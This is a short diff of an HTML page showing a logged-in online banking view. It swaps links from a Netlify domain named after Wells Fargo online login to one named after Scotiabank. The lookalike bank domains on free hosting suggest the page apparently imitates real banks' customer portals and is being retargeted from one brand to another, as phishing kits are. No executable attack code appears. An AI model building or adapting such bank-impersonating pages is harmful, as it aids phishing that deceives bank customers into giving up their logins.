--- a/index3.html
+++ b/index3.html
@@ -10,10 +10,10 @@
 	<br>
 	<br>
 	<ul>
-  <li><a href="https://wellsfargoonlinelogin.netlify.app/">Home</a></li>
+  <li><a href="https://noviascotiabank.netlify.app/index1">Home</a></li>
   <li><a href="news.asp">Online Banking</a></li>
   <li><a href="contact.asp">Loans</a></li>
-  <li><a href="https://wellsfargoonlinelogin.netlify.app/">Logout</a></li>
+  <li><a href="https://noviascotiabank.netlify.app/">Logout</a></li>
 </ul> 
 <h3>You're Logged in as Bill Bradbury</h3>
 <img align="left" src="https://res.cloudinary.com/denspvmmm/image/upload/c_scale,w_159/v1591862067/celsonbianchi___BeyhfJ8HL8x____njnssi.jpg"> 
